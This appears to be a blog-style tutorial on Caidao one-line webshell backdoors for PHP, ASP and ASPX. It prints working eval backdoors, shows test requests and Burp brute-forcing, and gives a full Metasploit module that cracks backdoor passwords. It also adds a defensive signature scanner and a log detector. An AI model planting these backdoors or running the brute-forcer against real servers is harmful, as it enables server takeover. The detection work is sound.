Backdoor Request

PHP Backdoor: <?php @eval($_POST["OP"]);?>

HTTP Request:

POST /bk.php

....

op=phpinfo();

If it succeeds, the phpinfo page is returned to us.

ASP Backdoor:

HTTP Request:

POST /bk.asp

op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.end")

If it succeeds, a page containing 'woo5woo' is returned to us (Len("admin") is 5).

ASPX Backdoor:

HTTP Request:

POST /bk.aspx

op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")

If it succeeds, a page containing 'woo5woo' is returned to us (1+4 is 5).
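The three backdoors above have the same shape: a one-line script that evaluates whatever arrives in one request parameter, so the parameter name is the only "password". From the defender's side the cheapest check is a signature scan of the web root for that shape. The scanner below is an added example and is not code from the original post; the PHP pattern is taken from the backdoor shown above, while the ASP and ASPX one-liners it matches (eval request("..."), eval(Request.Item["..."],"unsafe")) are the typical forms assumed here, not ones the post prints. The sample files are constructed.

```python
"""Scan a web root for one-line 'eval' webshells of the Caidao family.

Added example, not part of the original post. The PHP pattern follows the
backdoor shown above; the ASP/ASPX patterns are typical one-liners assumed here.
"""
import os
import re
from typing import Dict, List, Tuple

# Each rule: (name, regex). The capture group is the request parameter the
# shell evaluates, i.e. the "password" an attacker would have to guess.
RULES: List[Tuple[str, re.Pattern]] = [
    ("php_eval_post",
     re.compile(r'@?\s*eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*[\'"]?([A-Za-z0-9_]+)[\'"]?\s*\]', re.I)),
    ("php_assert_post",
     re.compile(r'@?\s*assert\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*[\'"]?([A-Za-z0-9_]+)[\'"]?\s*\]', re.I)),
    ("asp_eval_request",
     re.compile(r'\b(?:eval|execute)\s*\(?\s*request\s*\(\s*[\'"]([A-Za-z0-9_]+)[\'"]\s*\)', re.I)),
    ("aspx_eval_request_item",
     re.compile(r'\beval\s*\(\s*Request\.Item\s*\[\s*[\'"]([A-Za-z0-9_]+)[\'"]\s*\]', re.I)),
]


def scan_source(text: str) -> List[Tuple[str, str]]:
    """Return [(rule_name, parameter_name)] for every webshell pattern in text."""
    hits = []
    for name, rx in RULES:
        for m in rx.finditer(text):
            hits.append((name, m.group(1)))
    return hits


def scan_tree(root: str, exts=(".php", ".phtml", ".php5", ".asp", ".aspx")) -> Dict[str, List[Tuple[str, str]]]:
    """Walk a directory tree and return {path: hits} for every script that matches a rule."""
    findings: Dict[str, List[Tuple[str, str]]] = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            hits = scan_source(text)
            if hits:
                findings[path] = hits
    return findings


# Constructed sample files (file name -> contents); only index.php is benign.
SAMPLES = {
    "bk.php": '<?php @eval($_POST["OP"]);?>',
    "bk.asp": '<%eval request("op")%>',
    "bk.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%>',
    "index.php": '<?php echo "hello"; ?>',
}


def scan_samples() -> Dict[str, List[Tuple[str, str]]]:
    """Run the rules over the constructed samples instead of a real web root."""
    return {name: scan_source(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    import sys
    # Usage: python scan_webshells.py /var/www   (no argument: scan the samples)
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for path, hits in results.items():
        for rule, param in hits:
            print(f"{path}: {rule} (parameter {param!r})")
```

The captured parameter name is worth recording during incident response: it is the key the attacker must send on every request, so it is what you would look for in any WAF or full-request capture you have for the affected host.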

Crack a php backdoor

For example, we will crack the Caidao PHP backdoor step by step.

1. We create an HTML login form to learn how the PHP backdoor is used.

2. Click the label called "Click Here", and we will see the HTTP request in Burp Suite.

3. Send it to Intruder, and mark "adminadmin" as an Intruder variable.

Bingo! The password is 'adminadmin'. Now we can do the same with Metasploit as follows.

Crack backdoors with Metasploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chinese Caidao Backdoor Bruteforce',
      'Description'    => 'This module attempts to brute-force the password of a Chinese Caidao PHP/ASP/ASPX backdoor.',
      'Author'         => [ 'Nixawk' ],
      'References'     =>
        [
          [ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
        ],
      'License'        => MSF_LICENSE
    ))

    register_options([
      OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
      OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ]),
      OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
    ], self.class)

    register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
  end

  def backdoor_brute(uri, user, pass, payload, match)
    begin
      # The candidate password is the POST parameter name the backdoor evaluates;
      # the probe payload is sent as that parameter's value.
      data = "&user=#{user}&#{pass}=#{payload}"
      res = send_request_cgi({
        'uri'    => uri,
        'method' => "POST",
        'data'   => data
      })
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
      print_error("#{peer} - Service failed to respond")
      return :abort
    end

    print_status("#{peer} - brute force caidao password: \"#{pass}\"")

    # A 200 reply whose body carries the random marker means the payload was evaluated
    if res and res.code == 200 and res.body =~ /#{match}/mi
      print_good("#{peer} - Successful login: password - \"#{pass}\"")
      return :next_user
    end

    return
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    script_type = datastore['TYPE']

    # Random marker so the expected reply cannot be matched by accident
    junk = Rex::Text::rand_text_alphanumeric(4)
    match = "#{junk}4#{junk}"

    case script_type
    when /php$/mi
      payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";"
    when /asp$/mi
      payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"
    when /aspx$/mi
      payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\"));Response.Write(\"#{junk}\")"
    else
      print_error("#{peer} - Backdoor type is not supported")
      return
    end

    each_user_pass { |user, pass|
      backdoor_brute(uri, user, pass, payload, match)
    }
  end
end
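Seen from the web server, the module above produces a very recognisable trace: one client sends a burst of POST requests to a single script path, one per candidate password, and every one of them is answered 200 because the shell evaluates a non-existent parameter as an empty program. The detector below is an added example, not code from the original post or from the Metasploit module; it reads Apache "combined" format access-log lines (the sample lines are constructed) and flags any (client, script) pair that sends a threshold number of POSTs inside a sliding time window. The threshold and window values are assumptions to be tuned per site.

```python
"""Flag password brute-forcing against a one-line webshell in web access logs.

Added example, not part of the original post or of the Metasploit module.
Assumes Apache 'combined' log format and lines in chronological order.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, List, Optional, Tuple

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop the query string
        "status": int(m.group("status")),
    }


def detect_bursts(lines, threshold: int = 10, window_s: int = 60) -> List[Tuple[str, str, int]]:
    """Return [(ip, path, peak_count)] for every client/script pair that sends
    `threshold` or more POSTs within any `window_s`-second sliding window."""
    recent: Dict[Tuple[str, str], deque] = defaultdict(deque)
    alerts: Dict[Tuple[str, str], int] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        key = (rec["ip"], rec["path"])
        q = recent[key]
        q.append(rec["ts"])
        # Slide the window: discard timestamps older than window_s before the newest one
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return [(ip, path, n) for (ip, path), n in alerts.items()]


def build_samples() -> List[str]:
    """Constructed log lines: ordinary traffic plus a 12-request burst against /bk.php."""
    fmt = '{ip} - - [{ts}] "{m} {p} HTTP/1.1" {st} {sz} "-" "{ua}"'
    ua = "Mozilla/5.0 (constructed sample)"
    lines = [
        fmt.format(ip="198.51.100.5", ts="01/Nov/2014:10:14:00 +0000", m="GET", p="/index.php", st=200, sz=2048, ua=ua),
        fmt.format(ip="198.51.100.5", ts="01/Nov/2014:10:14:10 +0000", m="POST", p="/login.php", st=302, sz=0, ua=ua),
    ]
    # The brute force: one POST per candidate, all answered 200 with an empty body
    for i in range(12):
        lines.append(fmt.format(ip="203.0.113.7", ts=f"01/Nov/2014:10:15:{i:02d} +0000",
                                m="POST", p="/bk.php", st=200, sz=0, ua=ua))
    lines.append(fmt.format(ip="198.51.100.5", ts="01/Nov/2014:10:16:30 +0000", m="POST", p="/login.php", st=302, sz=0, ua=ua))
    lines.append(fmt.format(ip="198.51.100.5", ts="01/Nov/2014:10:20:05 +0000", m="POST", p="/login.php", st=200, sz=512, ua=ua))
    return lines


if __name__ == "__main__":
    import sys
    # Usage: python detect_bursts.py /var/log/apache2/access.log   (no argument: run the samples)
    src = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else build_samples()
    for ip, path, n in detect_bursts(src):
        print(f"possible webshell brute force: {ip} -> {path} ({n} POSTs in window)")
```

A hit on a script that is not a known form handler is the interesting case; combining this with the file scan of the web root tells you whether the target path really is a one-line eval shell.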
